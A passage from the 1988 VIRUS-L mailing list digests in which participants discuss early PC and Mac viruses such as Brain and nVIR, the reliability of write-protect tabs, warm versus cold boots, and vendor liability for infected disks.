  4684. First, the number of commercial programs being distributed with
  4685. viruses (*known viruses* - they could have easily detected and
  4686. prevented them) is growing weekly.
  4687.  
  4688. Second, the license agreements of most or all software packages
  4689. prevent you from suing the distributor or author for lost property.
  4690.  
  4691. >This kind of malice shakes our society to its very foundations; it
  4692. >resembles offering toxic or rotten food in a restaurant, or loosening
  4693. >bolts at the steering assembly of other people's cars.
  4694.  
  4695. Both of the acts you mention have a very limited scope, and do not
  4696. affect more than a tiny fraction of the population.  I'd think a more
  4697. accurate comparison would be someone who creates an AIDS vaccine for
  4698. himself, then infects himself with AIDS and deliberately has sexual
  4699. contact with as many people as possible.
  4700.  
  4701. >However, a certain amount of caution can be expected from the customer's
  4702. >side: you probably would not go out to a dirty restaurant, and you would
  4703. >ask everybody (even your friends) what they were doing under your car, if
  4704. >you caught them working there and hadn't asked them for help.  My recent
  4705. >note meant to establish this sort of common sense for receiving and
  4706. >running programs, now we all have heard of possible virus carriers.
  4707.  
  4708. Even nice, clean people get AIDS.  The untrustworthy person has
  4709. intercourse with a slightly more trustworthy person, and that person
  4710. has intercourse with a slightly more trustworthy person, and so on.
  4711. Or a really trustworthy person suffers a single lapse of judgement.
  4712. Etc., etc.  And software 'condoms' are a lot harder to come by, given
  4713. the nature of computing devices.
  4714.  
  4715. >> Sometimes even the people writing the software do not understand all of
  4716. >> it.
  4717. >
  4718. >Then, they'd better attend a course in structured programming or give
  4719. >up programming, altogether.
  4720.  
  4721. I personally know of a software project that is in excess of ten
  4722. million lines of code.  I dare anyone to (within ten years) read and
  4723. understand in detail all of it.
  4724.  
  4725.  
  4726. Dan Hankins
  4727.  
  4728. ------------------------------
  4729.  
  4730. End of VIRUS-L Digest
  4731. *********************
  4732.  
  4733. VIRUS-L Digest              Monday, 19 Dec 1988         Volume 1 : Issue 52
  4734.  
  4735. Today's Topics:
  4736. List of known viruses (PC & Mac)
  4737. MS-DOS and write protected diskettes
  4738. Re: Virus listings and the DIRTY DOZEN listings
  4739. Diskette write-protection (PC)
  4740. article in pc magazine
  4741. Write protect tab and warm boot inadequacy, etc. (PC & Mac)
  4742. Write protect tabs
  4743. how vicious is nVIR? (Mac)
  4744. my $0.02 on write protect tabs and reset keys (PC)
  4745.  
  4746. ---------------------------------------------------------------------------
  4747.  
  4748. Date:      Mon, 19 Dec 88 08:42:39 LCL
  4749. From:      Bret Ingerman [{315} 443-1865] <INGERMAN@SUVM.BITNET>
  4750. Subject:   List of known viruses (PC & Mac)
  4751.  
  4752.    I just read someone else asking if there is a comprehensive list of
  4753. viruss for the PC and Mac.  I was the one who originally asked the
  4754. question and volunteered to compile such a list.  I have a copy of the
  4755. Dirty Dozen, but it is out of date (Feb. 1988, I believe).
  4756.  
  4757.    I received a lot of replies from people on the list who thought a
  4758. comprehensive file would be great.  I'm still willing to edit one
  4759. together.  What I need is for the "experts" to send me a note with the
  4760. name of the virus, what system it can be found on, what does it do,
  4761. how to check for it, and how to eradicate it.  It would also be nice
  4762. if you would let me know if I can include your name/userid so that
  4763. people with more involved questions can get in touch with you.  What
  4764. does everyone think?
  4765.  
  4766.         BRET INGERMAN   ACADEMIC COMPUTING SERVICES
  4767.               ______    SYRACUSE UNIVERSITY
  4768.              /      |         -------
  4769.             |       |   BITNET:    INGERMAN@SUVM
  4770.   _________/        |   NOISENET:  (315) 443-1865
  4771.   |         *       |   SNAILNET:  215 Machinery Hall
  4772.  /      SYRACUSE    |              Syracuse, NY 13244-1260 USA
  4773. |______________     |
  4774.                |_   |
  4775.                  |__|   Disclaimer:  (use your favorite)
  4776.  
  4777. ------------------------------
  4778.  
  4779. Date:         Mon, 19 Dec 88 09:23:19 EST
  4780. From:         Joe Simpson <JS05STAF@MIAMIU.BITNET>
  4781. Subject:      MS-DOS and write protected diskettes
  4782.  
  4783. 1.  Media susceptible to virus attack.
  4784.     Formatted MS-DOS diskettes with or without an operating system
  4785.     have a boot block.  Some viruses, including Brain, can subvert
  4786.     this boot block and use it as a vector for infection.  Some
  4787.     viruses also can survive a warm boot.  Thus it is quite possible
  4788.     for a disk containing only Fortran source code to be infected.
  4789.     This can happen while DOS as we know it is active, or after an
  4790.     attempt to warm boot the diskette on an infected computer.
  4791. 2.  Write protect tabs and protection.
  4792.     This topic has come up before on this list.  If the write protect
  4793.     circuitry works at the hardware level to prevent energizing the
  4794.     write head you are protected.  If protection is the result of
  4795.     MS-DOS software sensing the tab and reacting accordingly, then
  4796.     the level of protection is substantially reduced.  I know of no
  4797.     manufacturer who publicly asserts that one or the other of these
  4798.     alternatives has been choosen.  Caveat Emptor.  On a more
  4799.     positive note, there is weak evidence that the origional IBM PC's
  4800.     used real hardware protection.  If anyone can authoritatively
  4801.     assert that brand X MS-DOS computers use one or the other forms
  4802.     of protection, it would be wonderful to have the information,
  4803.     with source citation, posted to this list.
  4804.  
  4805. ------------------------------
  4806.  
  4807. Date:         Mon, 19 Dec 1988 09:37 EST
  4808. From:         J.D. Abolins
  4809. Subject:      Re: Virus listings and the DIRTY DOZEN listings
  4810.  
  4811.    The last DIRTY DOZEN listing I know of is the one from April 88-
  4812. version 8B. I have lost contact with Eric Newhouse since he left Los
  4813. Angeles and moved to Massachusettes. I have tried the new number
  4814. mentioned by the telephone company recording for the CREST BBS's
  4815. former number: no answer.So if anyone knows how to contact Eric
  4816. Newhouse and/or has a more recent version of the DIRTY DOZEN listing,
  4817. please let me know.
  4818.  
  4819.    I have been seeking to start up such a listing and am willing to
  4820. carry on with it or help anybody else with such a project. But I
  4821. should mention some special challenges that Eric and I saw coming up
  4822. with computer viruses-
  4823.  
  4824. * The biggest challenge is that viruses (the "classic definition"
  4825.   type, not the current popular designation), are carried WITHIN
  4826.   other- usually otherwise legitimate - files. The other types of
  4827.   "bogusware" (Trojans, worms, hacked or pirated software, etc.)
  4828.   are distinct files by themselves. Being distinct files, they are
  4829.   easier to spot and describe. Many have evident characteristics -
  4830.   display screens, texts, promised effects,etc. Viruses do not
  4831.   have these characteristics.
  4832.  
  4833. * So we need to develop a better cataloging system. I have read
  4834.   several of these proposals and still weighing them.
  4835.  
  4836. * Also, because the viruses tend to lack "surface characteristics"
  4837.   described above, a virus "dirty dozen" listing may not as helpful
  4838.   in prevention as in the detection and diagnosis of virus case.
  4839.  
  4840. * The reporting of viruses as compared to other forms of "bogusware"
  4841.   has been a "Swiss Chesse" - some substance and many holes. Samples
  4842.   of the offending programs are virtually impossible to obtain.
  4843.   Many victims of viruses are far more cautious in their comments than
  4844.   the victims of Trojans Horses. So in any listings one does, there
  4845.   will be a "fog factor" where the verification of facts is difficult.
  4846.  
  4847.   For the last point, a trusted "go-between" might be a great help.
  4848. Dr. Highland of COMPUTERS & SECURTIYmagazine has been one such
  4849. "go-between" in my experience. Dr. Fred Cohen and some others also
  4850. can fill such a function. The reason for this is that people like Eric
  4851. Newhouse, I or most of the people on this discussion list lack the
  4852. credentials to establish trust sufficient for virus victims, especially
  4853. in industry and governemnt, to share information. From the items that Dr
  4854. Highland has shared with me, I can see the editting that he must do to
  4855. maintain the contact he has. Furthermore there are things that I have
  4856. been told by him and others that have come with a request for
  4857. confidentiality. So anybody who does this type of info clearing
  4858. has to have discretion and accountability.
  4859.  
  4860. In parting, I'll leave a partial listing of the major virus
  4861. cases I have come across in the past year or so-
  4862.  
  4863. Hebrew University case (aka Israeli virus and, unfortunately, the
  4864. misnomer- the "PLO virus" which I mention only so that if readers
  4865. run across such reference, they will know it really is.)There are
  4866. several variants of this virus.
  4867.  
  4868. The Lehigh University case
  4869.  
  4870. The AMIGA SCA virus
  4871.  
  4872. The BRAIN and its variants - ASHER, ASHTAR, ISHTAR, etc.
  4873.  
  4874. TheMACMAG case
  4875.  
  4876. The SCORES virus
  4877.  
  4878. These are the ones that have gotten the most attention, but there are
  4879. other. Some bear resemblence to the cases mentioned. As I have listed
  4880. the virus case, I notice another problem in making a listing. The
  4881. designation of the virus types. Unlike Trojan Horses, most viruses
  4882. don't go under a common used filename. Often, the site of the first
  4883. reported incident is used. This can lead to another hinderence to
  4884. repoirting such cases. Many universities, companies, etc. do not desire
  4885. to have their names immortalized in the name of a virus. (This is
  4886. true for both computer and biological ones.) A more neutral form
  4887. of designating the viruses in any listings that I or others may do
  4888. would help to lessen this obstacle.
  4889.  
  4890. Thank you,
  4891.  
  4892. J. D. Abolins
  4893. 301 N. Harrison Street, #197
  4894. princeton, NJ 08540    (609) 292-7023
  4895.  
  4896. ------------------------------
  4897.  
  4898. Date: 19 December 1988, 10:05:33 EST
  4899. From: David M. Chess              CHESS    at YKTVMV
  4900. Subject: Diskette write-protection (PC)
  4901.  
  4902. 'way, 'way back, before VIRUS-L was even a digest, we went around
  4903. on this several times, and it was generally agreed that on virtually
  4904. all IBM PC compatible diskette drives, write protection with the
  4905. little tabs is in fact in hardware, and that software can't write
  4906. on a properly-tabbed diskette.   If you have really seen a
  4907. write-protected diskette get infected, the possibilities are:
  4908.  
  4909.   - You were using a tab that doesn't work (for instance, some
  4910.     drives detect the tab optically, and some tabs are not
  4911.     opaque!),
  4912.   - The tab wasn't on right (dented, holed, etc),
  4913.   - The drive is broken, and write-protection isn't working,
  4914.   - The drive in question is a very non-standard one, with
  4915.     software write-protection (and you happened to pick up a
  4916.     virus that knows about that kind of drive!),
  4917.   - The infection actually happened at a time different from
  4918.     when you think it did (for instance, at least one version
  4919.     of the Brain diddles the system so that if you try to
  4920.     look at the boot sector while the virus is resident, you
  4921.     will be shown an uninfected boot sector, even though the
  4922.     real boot sector is in fact infected).
  4923.  
  4924. I think the whole list would be very interested if you could
  4925. duplicate the effect on correctly used, working, standard
  4926. hardware!
  4927.  
  4928. DC
  4929.  
  4930. ------------------------------
  4931.  
  4932. Date:         Mon, 19 Dec 88 11:38:41 EDT
  4933. From:         Swifty LeBard <FALL8076@PACEVM.BITNET>
  4934. Subject:      article in pc magazine
  4935.  
  4936.     two issues back in pc magazine, john dvorak wrote an article
  4937.  pertaining to the issue of software manufacturers imbedding viruses
  4938.  in their applications.
  4939.     he stated that many companies are doing this to sort of 'do away
  4940.  with the competition'. the virus writes itself to the boot disk and
  4941.  when booted up searches for the competition. if found, it does some damage.
  4942.  (the following is a hypothetical example!)  i.e.
  4943.    ashton tate writes a bug to the boot disk and upon booting up and using
  4944.   foxbase, the bug does some mean things!
  4945.  
  4946.     i hope that software (as well as hardware) manufactureres do not
  4947.  continue implenting viruses to monopolize the market. heaven knows we small
  4948.   at users will have to program our own applications!
  4949.     swifty LeBard OO--=+
  4950.  
  4951. ------------------------------
  4952.  
  4953. Date:         Mon, 19 Dec 88 11:52:11 EST
  4954. From:         "Christian J. Haller" <CJH@CORNELLA.ccs.cornell.edu>
  4955. Subject:      Write protect tab and warm boot inadequacy, etc. (PC & Mac)
  4956.  
  4957. >>          I found that if I booted a machine with an infected disk,
  4958. >>          and then put a new clean boot disk WITH A WRITE PROTECT
  4959. >>          TAB in the same machine and performed a warm boot, the new
  4960. >>          disk also became infected. Nothing short of turning the
  4961. >>          machine off and then back on was safe enough.
  4962. >Could some one please explain
  4963. >
  4964. >1. Why a warm boot by itself is not enough to prevent the spread of
  4965. >infection
  4966.  
  4967. A virus or Trojan already present in memory (because it was run since
  4968. the last cold boot) can trap keystroke combinations like Control-Alt-
  4969. Delete and fake a warm boot by calling a similar BIOS routine that does
  4970. not clear active memory.  Power users would probably detect this from
  4971. noticing differences in timing and boot messages, but the potential is
  4972. there for deceit as long as the DRAM has power.  CMOS will be even more
  4973. vulnerable, because it will usually keep memory even when the machine
  4974. is powered off.  And unplugged.  Thanks to batteries.
  4975.  
  4976. >2. How a write-protected boot disk could get infected during warm boot.
  4977.  
  4978. An IBM PC can write to a write protected floppy via a low level BIOS
  4979. directive which bypasses DOS and directly addresses the diskette drive
  4980. controller hardware.  If the BIOS directive is absent from some versions
  4981. of DOS, it may still be possible to address the hardware below the BIOS
  4982. level.
  4983.  
  4984. (From a different poster:)
  4985. >     We have for a long time been considering selling a MAC disk that
  4986. >would introduce the user to fractals that was written in Forth and was
  4987. >highly interactive and very much executable code.  With all this virus
  4988. >stuff going around I have had to have second thoughts.
  4989.  
  4990. There is no known corresponding software bypass for Macs; i.e., a Mac
  4991. diskette is really hardware protected if its tab is slid to the corner
  4992. of the diskette.  So your Mac disks should be safer.
  4993.  
  4994. >     From what I can see, there is no absolutely safe way to guarantee
  4995. >that the disks I send out are virus free, and no safe way to prove
  4996. >they WERE virus free if they should later become infected.
  4997.  
  4998. From a purely technical perspective, I agree:  there is no absolutely
  4999. safe proof that your machines are not ALREADY infected with some very
  5000. subtle virus that might pass itself on undetected.  However, such a virus
  5001. would be very difficult to write if someone knowledgeable were looking
  5002. for it, and had access to the source code and compilers used to develop
  5003. the software intended for market.  Furthermore, there are ways to prove
  5004. that the files you write and intend to ship are identical to the files
  5005. the end user is reading, even after years of use.  The proof is
  5006. statistical, using polynomial checksums, for example; commercial products
  5007. will soon appear using this approach.
  5008.  
  5009. >     1.)  Who is legally liable for a virus if a new disk bought by a
  5010. >customer has one?  How does one prove that one did one's best to
  5011. >insure the disk was virus free?  Does it matter that one did one's
  5012. >best or is it always the manufacturer's fault?
  5013.  
  5014. I'm no lawyer, but I have read that you can never tell what a jury will do.
  5015.  
  5016. >     2.)  Should I produce the disk?
  5017.  
  5018. I would say yes, using reasonable caution.  If you are sued, through no
  5019. real fault of your own, any good lawyer should be able to whip up a
  5020. countersuit.  That's the way we're all going to get rich in 2007, by
  5021. sueing each other.  Kind of like a chain letter.
  5022.  
  5023. >     3.)  What is going to happen to the software industry as a whole?
  5024.  
  5025. It will survive, and here is your best legal protection.  If you use
  5026. common sense in your software distribution, look for evidence of known
  5027. viruses, compare files for unwanted modification, and provide checksum
  5028. info for recipients, you will be ahead of EVERYONE else in the software
  5029. industry and no one in her/his right mind would pick on you to sue.  If
  5030. you also provide source code and info about the compilers you used, you
  5031. will STAY ahead of everyone else in the industry for years to come, and
  5032. your users will take care of a lot of your R&D by suggesting improvements
  5033. (if you play your cards right, they will write, test, and document these
  5034. improvements for you in return for favorable mention in your newsletter).
  5035. Acknowledge-To: <CJH@CORNELLA>
  5036.  
  5037. ------------------------------
  5038.  
  5039. Date:         Mon, 19 Dec 88 12:50:55 EST
  5040. From:         Jim Kenyon <TGHVET@vm.utcs.utoronto.ca>
  5041. Subject:      Write protect tabs
  5042.  
  5043. >From my old Apple ][+ days, and I know some IBM drives are the same,
  5044. not all drives look for a mechanical block over the write protect tab.
  5045. Many look for a block to a light beam....which means that if you are using
  5046. anything that is opaque or transparent, the beam will go right thru and
  5047. assume there's nothing there.  Always use totally opaque tabs or you may get
  5048. a nasty surprise.
  5049.  
  5050. Another thing that has gotten lost in the discussion is the early comments
  5051. on viruses coming from the manufacturer.  I've been hit with nVIR (MAC)
  5052. straight from the dealer....but from a commercial software package.  NOT
  5053. from "fresh disks from reputable factories".  It was put there by the
  5054. software vendor.  Go for it Homer!  Make sure you're clean and put a good
  5055. disclaimer on it.  They don't come from the factory with viruses.
  5056.  
  5057. Jim Kenyon                                    NetNorth TGHVET@UTORONTO.CA
  5058. Dept. of Anaesthesia
  5059. Toronto General Hospital
  5060.  
  5061. ------------------------------
  5062.  
  5063. Date:         Mon, 19 Dec 88 13:20:31 EST
  5064. From:         Michael Palmer <PALMICE@YALEVM.BITNET>
  5065. Subject:      how vicious is nVIR? (Mac)
  5066.  
  5067.    I find that one of my disks is infected by the nVIR virus. (My
  5068. thanks go to John Norstad of Stanford for a very informative posting
  5069. on the nVIR and Scores viruses - VIRUS-L, 15 Nov.) What can I expect
  5070. from nVIR - does it simply spread quietly or is it a 'timebomb' virus
  5071. that will eventually start doing damage to disks? How worried should I
  5072. be?
  5073.    A mystery: all that nVIR appears to do when I run an infected
  5074. application is remove itself from that application, without adding
  5075. itself to another appplication as far as I can tell - the nVIR
  5076. resources disappear and the application's own resources are all the
  5077. same size as before infection. A virus can't get very far by behaving
  5078. like that, so what am I missing?
  5079.    I would like to recommend the Vaccine program for the Mac (a
  5080. well-written INIT which alerts you to significant changes to
  5081. resources) - it's what first tipped me off.
  5082.    The dates of other old postings to VIRUS-L concerning nVIR would
  5083. also be very useful.
  5084.  
  5085. With thanks,
  5086.  
  5087. Mike Palmer
  5088.  
  5089. ------------------------------
  5090.  
  5091. Date: Mon, 19 Dec 1988 15:17:33 EST
  5092. From: Ken van Wyk <luken@spot.CC.Lehigh.EDU>
  5093. Subject: my $0.02 on write protect tabs and reset keys (PC)
  5094.  
  5095. > Christian J. Haller writes (in this issue):
  5096. > A virus or Trojan already present in memory (because it was run since
  5097. > the last cold boot) can trap keystroke combinations like Control-Alt-
  5098. > Delete and fake a warm boot by calling a similar BIOS routine that does
  5099. > not clear active memory.
  5100. > ...
  5101. > but the potential is there for deceit as long as the DRAM has power.
  5102.  
  5103. On IBM PC compatibles, the Ctrl-Alt-Del sequence is a software driven
  5104. reset, therefore it is quite possible and feasible for a program to
  5105. trap the keyboard interrupt and fake a reboot (the Yale virus that
  5106. Chris Bracy showed me did this).  During an *actual* reboot, all
  5107. interrupt vectors, etc., are initialized; thus, a virus that is active
  5108. would become inactive if an actual reboot takes place.  The only way
  5109. (that I know of) that a virus could remain in memory would be to
  5110. simulate a boot process by loading the boot tracks, etc., while
  5111. remaining in "control" of its own interrupts and allocated memory.
  5112. Some machines do have hardware resets, however, which would prevent
  5113. this (a hardware reset forces the machine to perform a reboot as per a
  5114. power-up state).  The Zenith Z-100 (8088 based, MS-DOS 3.1, non-IBM PC
  5115. compatible), for example, has a hardware reset that cannot be trapped
  5116. by software.  In fact, most (all?)  machines used hardware reset
  5117. buttons until the IBM PC came along, and then in the interest of
  5118. compatability, other companies used software resets also...(10,000
  5119. lemmings can't be wrong!  :-)
  5120.  
  5121. > Christian J. Haller writes (in this issue):
  5122. > An IBM PC can write to a write protected floppy via a low level BIOS
  5123. > directive which bypasses DOS and directly addresses the diskette drive
  5124. > controller hardware.
  5125.  
  5126. Can anyone verify that a program can write to a properly
  5127. write-protected disk?  I just wrote a short MASM program that
  5128. attempted to use INT 13H function 03H (absolute disk write) to write
  5129. to a floppy disk, which was write-protected with an opaque (flat
  5130. black) write protect tab in a 5 1/4" 360k drive on a Zenith Z-386.
  5131. The program failed to write to a write-protected floppy disk, but (as
  5132. is to be expected) had no problems writing to a non-write-protected
  5133. disk.  That's the closest ROM BIOS interrupt to the disk controller
  5134. hardware that I know of.  Anyone want to write a short piece of code
  5135. that programs the disk controller itself without the aid of any
  5136. supplied interrupts?
  5137.  
  5138. This topic has been kicked around unconclusively here for some time
  5139. now, and unless someone can come up with a verifyable and duplicatable
  5140. method to get around a properly write-protected disk, then I think
  5141. that we should assume that it is not possible to circumvent.
  5142.  
  5143. Ken
  5144.  
  5145. Kenneth R. van Wyk                   Mom: Calvin, what do you need designer
  5146. User Services Senior Consultant           jeans for?!
  5147. Lehigh University Computing Center   Hobbes: Pssst, for the babes!
  5148. Internet: <luken@Spot.CC.Lehigh.EDU> Calvin: The babes, Mom, I gotta look
  5149. BITNET:   <LUKEN@LEHIIBM1>                cool!
  5150.  
  5151. ------------------------------
  5152.  
  5153. End of VIRUS-L Digest
  5154. *********************
  5155.  
  5156. VIRUS-L Digest             Tuesday, 20 Dec 1988         Volume 1 : Issue 53
  5157.  
  5158. Today's Topics:
  5159. Viruses in Commercial Software; Write-Tabs
  5160. Thwarting the Brain... (PC)
  5161. Cold boot vs. warm boot... (PC)
  5162. Virus file and the nets
  5163.  
  5164. ---------------------------------------------------------------------------
  5165.  
  5166. Date:         Mon, 19 Dec 88 18:19:42 EST
  5167. From:         Steve <XRAYSROK@SBCCVM.BITNET>
  5168. Subject:      Viruses in Commercial Software; Write-Tabs
  5169.  
  5170. In regard to Homer Smith's letter about his risks from unintentional
  5171. virus contamination of the commercial disks he produces:
  5172.  
  5173.    1) Disks containing only source code are *not* absolutely safe, but
  5174. they would be much safer, in my opinion, if carefully examined.  There
  5175. is nothing to prevent a virus or some such thing from writing hidden
  5176. files or storing things in "bad" sectors where the average person
  5177. doing a DIR wouldn't see them.  Furthermore, a virus could write the
  5178. essential part of itself onto the boot sector (like brain does) and
  5179. wait for someone to boot their system with the disk in place, at which
  5180. time it could become active.
  5181.  
  5182.    2) I would recommend that you periodically examine your disks for
  5183. known viruses (like looking at the boot sector with Norton utilities
  5184. or the like) and running detection programs for known viruses.  It
  5185. should not be necessary to examine every single disk --- only a small
  5186. representative sample, assuming that potential viruses will always
  5187. infect a disk if presented (except that one can imagine a virus that
  5188. only attacks on Tuesdays).  For example, periodically inspect some of
  5189. the most recent disks and also whenever you have introduced something
  5190. from outside your system (e.g. a new program or somebody else's disk).
  5191. If you don't have the time or perhaps expertise, I would think it
  5192. would be well worth your while to get someone to do it for you (at
  5193. least find out which programs you should be using to look for
  5194. viruses).  Does anybody know of anyone who specializes in examining
  5195. other people's disks for viruses (like for $)?
  5196.  
  5197.    3) If you keep the system used to produce your product well
  5198. isolated, then your risks should be lessened considerably.
  5199.  
  5200.    4) Maybe consulting a lawyer would help, but couldn't you state in
  5201. the fine print in the literature distributed with your disks that you
  5202. have taken great pains to isolate your system (and product) from
  5203. potential sources of viral contamination, and that you regularly check
  5204. your system and disks for common, known viruses...  BUT (here comes
  5205. the disclaimer) you assume no responsibility for anything harmful that
  5206. might be on any of your disks, and that the buyer in buying the
  5207. product acknowledges this and uses it at his own risk?  That is, you
  5208. state that you have taken every reasonable measure to protect the
  5209. consumer, but for legal reasons wash your hands of any liability --- a
  5210. licensing agreement.
  5211.  
  5212.    5) About a virus writing on a disk inspite of a write-protect tab,
  5213. I don't believe it.  I think there must be a misunderstanding
  5214. somewhere.  I suppose the details of enforcing a write-lock vary, but
  5215. they all rely on hardware that disables the write-mode of the disk
  5216. drive.  There is no way software can circumvent this protection,
  5217. unless your drive is defective and the write-lock-tab feature isn't
  5218. working properly.
  5219.  
  5220. Steven C. Woronick      | Disclaimer:  I'm just a physicist.  These are
  5221. Physics Dept.           | entirely my own opinions and not necessarily
  5222. SUNY                    | anybody else's and may not even be right...
  5223. Stony Brook, NY  11794  |
  5224. Acknowledge-To: <XRAYSROK@SBCCVM>
  5225.  
  5226. ------------------------------
  5227.  
  5228. Date:     Mon, 19 Dec 88 17:43 EST
  5229. From:     <MATHAIMT@VTCC1.BITNET>
  5230. Subject:  Thwarting the Brain... (PC)
  5231.  
  5232. Reading all the comments about the brain virus one thing becomes
  5233. clear: It can be detected because it announces itself in the Boot
  5234. record with messages like "Welcome to the dungeon", "BRAIN COMPUTER
  5235. SERVICES" etc etc etc...  I can't help but wonder what would happen if
  5236. some wily person decided to create his or her own strain with
  5237. absolutely no messages (including not modifying the volume label). I
  5238. shudder even as I write this. Could detection be that easy then
  5239. atleast for lay persons like me. Most of the preventive measures that
  5240. I've read so far say something like "Use a disk editor like Norton
  5241. Utilities and examine the Boot record. If you see a message saying
  5242. Brain etc etc, then your disk is infected" What if there were no
  5243. messages. I c wouldn't know the difference between the boot record of
  5244. an uninfected disk and that of an infected disk.(of late I've been
  5245. peering into the boot record of every 5.25" floppy I own ! Thats how
  5246. paranoid I've become) . What's a possible solution.  Pre formatted
  5247. floppy disks of two kinds (bootable and non bootable) where only the
  5248. manufacturer does any work with the boot record. (Vendors are already
  5249. sellin g pre formatted disks so thats not so absurd, is it?)  A
  5250. special material for the boot record which can cause it to be read but
  5251. not written to, except by special devices which only manufacturers
  5252. will own.  This may seem off the wall right now but I think we all
  5253. need to think of some solution to this "modification of boot record"
  5254. business, especially because most programs can't treat it like a
  5255. normal file and hence can't check for any changes to the boot record.
  5256. (I'm referring to programs like flushot and checkup which can be made
  5257. to check files for changes since the last run).  Any
  5258. comments/additions to the theme?
  5259.  
  5260. Mathew Mathai
  5261. Virginia Tech
  5262. bitnet : MATHAIMT@VTCC1
  5263.  
  5264. ------------------------------
  5265.  
  5266. Date: 19 December 1988 21:22:30 CST
  5267. From: "Michael J. Steiner  " <U23405@UICVM.BITNET>
  5268. Subject:  Cold boot vs. warm boot... (PC)
  5269.  
  5270. How can a virus stay "effective" after a warm boot? Aren't both kinds of
  5271. boots the same? (Evidently, there must be differences; what are they?)
  5272.  
  5273.                                              Michael Steiner
  5274.                                              Email: U23405@UICVM.BITNET
  5275.  
  5276. ------------------------------
  5277.  
  5278. Date:     Mon, 19 Dec 88 22:38:24 PST
  5279. From:     Robert Slade <USERCE57@UBCMTSG.BITNET>
  5280. Subject:  Virus file and the nets
  5281.  
  5282. I am being flooded with requests for the files, so you may get delayed
  5283. responses.
  5284.  
  5285. You may also get no responses.  For some reason, many messages get through to
  5286. me, but the return path won't work.  Sorry about that.  Not much I can do.
  5287.  
  5288. KLOTZBUECHER@MPI-MUELHEIM.MPG.DBP.DE - he changed his name to "Silver Donald
  5289. Cameron.  What disks do you use?  $15-20.
  5290.  
  5291. ------------------------------
  5292.  
  5293. End of VIRUS-L Digest
  5294. *********************
  5295.  
  5296. VIRUS-L Digest             Tuesday, 20 Dec 1988         Volume 1 : Issue 54
  5297.  
  5298. Today's Topics:
  5299. Re: Trapdisk (PC)
  5300. Re: nVIR? (Mac)
  5301. Re: Confusion about the Brain virus. (PC)
  5302. Warm boot & thwarting the Brain (PC)
  5303. Writing with a write protect tab (CP/M & PC)
  5304. Write protect tabs (PC & Apple ][e)
  5305. write locking floppies (PC)
  5306. Write Protection on the Apple II series
  5307. IBM BIOS ROM source listing of disk write (PC)
  5308.  
  5309. ---------------------------------------------------------------------------
  5310.  
  5311. Date:        20 December 88, 15:42:14 MEZ
  5312. From:        Otto Stolz    +49 7531 88 2645     RZOTTO   at DKNKURZ1
  5313. In-Reply-To: Poster of 16 Dec 88 13:59:46 -0800 from SLCLANCY at UCI
  5314. Subject:     Re: Trapdisk (PC)
  5315.  
  5316. > but I do not like that it remains memory resident.
  5317.  
  5318. Steve,
  5319.  
  5320. this is the only way a program can monitor other programs' activities,
  5321. e.g. disk writes.  So you have to live with it.
  5322.  
  5323. If I'm right, a memory-resident program can only monitor disk-writes
  5324. that are initiated through normal DOS (and perhaps BIOS) calls, but no
  5325. low-level disk-writes (which would normally be even more destructive).
  5326. So don't feel too sure with Trapdisk and the like!
  5327.  
  5328. Best regards
  5329.              Otto
  5330.  
  5331. ------------------------------
  5332.  
  5333. Date:         Tue, 20 Dec 88 10:24:33 EST
  5334. From:         Joe McMahon <XRJDM@SCFVM.BITNET>
  5335. Subject:      Re: nVIR? (Mac)
  5336.  
  5337. nVIR is a not-too-bright, kind of silly virus that really doesn't do
  5338. anything much other than count the number of infections (and to say
  5339. "Don't panic" or beep on a 1/16 chance).
  5340.  
  5341. >From what you were saying, its sounds like you may have the "suicide
  5342. resource" around somewhere. Check your System file for an nVIR ID=10
  5343. with ResEdit. If that resource is there, nVIR (at least one version)
  5344. will remove itself from applications. Note that the mere presence of
  5345. the resource is checked; the nVIR 10 need have nothing in it.
  5346.  
  5347. - --- Joe M.
  5348.  
  5349. ------------------------------
  5350.  
  5351. Date:        20 December 88, 15:50:16 +0100 (MEZ)
  5352. From:        Otto Stolz      +49 7531 88 2645     RZOTTO   at DKNKURZ1
  5353. Subject:     Re: Confusion about the Brain virus. (PC)
  5354.  
  5355. > Could some one please explain why a warm boot by itself is not enough
  5356. > to prevent the spread of infection
  5357.  
  5358. When a program makes itself memory-resident, as many Virus strains
  5359. (e.g.  Brain, Israel, Blackjack) do, it can hook (and subsequently
  5360. respond to) ANY interrupt.  These are normal MS-DOS services.
  5361.  
  5362. Probably, the Brain virus (I've actually never seen one) hooks the
  5363. keyboard interrupt, and responds to the CTRL-ALT-DEL key combination
  5364. with re-initializing itself and booting the rest of the system.  For a
  5365. bootsector virus, as Brain, this should be particularily easy, as the
  5366. necessary code is already there.
  5367.  
  5368. Given this possibility, it is wise to switch an MS-DOS system OFF and
  5369. again ON after every virus infection, as long as you don't know really
  5370. everything about you un-welcome guest.  If you switch off a PC, the
  5371. whole memory is erased (only CMOS is retained, which is rather small,
  5372. and contains the hardware-configuration & clock-time).  But don't forget
  5373. taking out the infected diskette before you switch on again :-)
  5374.  
  5375. > Could some one please explain how a write-protected boot disk could
  5376. > get infected
  5377.  
  5378. Yes, indeed, could someone explain?  I was quite sure that the write-
  5379. protect tab is a hardware-feature!  Am I wrong???
  5380.  
  5381. Some possibilities, I could think of, regarding that recent posting on
  5382. a perceived infection of a write-protected diskette:
  5383.  
  5384. 1. The diskette was infected some other time, when it was not protected.
  5385.    Remember, we read these days in VIRUS-L that some Brain variant is
  5386.    very clever in hiding itself:  it even fools DEBUG and other utilities
  5387.    in displaying a copy of the original boot-sector (from a "bad" sector)
  5388.    instead of the infected one.
  5389.  
  5390. 2. The write-protect tab was not applied properly.
  5391.    Remember, that the logic of 3.5" diskettes is opposed to the 5.25"
  5392.    logic, which could give rise to confusion.  Remember that we read some
  5393.    months ago in VIRUS-L, that certain sorts of half-transparent tabs
  5394.    do not work with certain devices.
  5395.  
  5396. 3. The hardware used did not work properly.
  5397.    So far, we've read only about one single incident on one single
  5398.    computer!  Remember, that there are indeed devices that can write
  5399.    regardless of the tab. (How else could Microsoft deliver their soft-
  5400.    ware on diskettes without a write-enable notch?)  Some months ago,
  5401.    when this matter was discussed here, somebody wrote that there's only
  5402.    one wire to inhibit writing;  if this wire is broken, what would be
  5403.    the effect?  And who knows all brands of all diskette-drives, and
  5404.    their properties?
  5405.  
  5406. I'd apprecieate greatly, if these possibilities would be checked
  5407. thoroughly and reported back to VIRUS-L.  I hope the person who embarked
  5408. on this topic could contribute (I forgot who it was, and have not enough
  5409. disk space available to store the digests, permanently).
  5410.  
  5411. Best wishes for a merry Xmas without virus attacks :-)
  5412.                                                        Otto
  5413.  
  5414. ------------------------------
  5415.  
  5416. Date: 20 December 1988, 10:25:50 EST
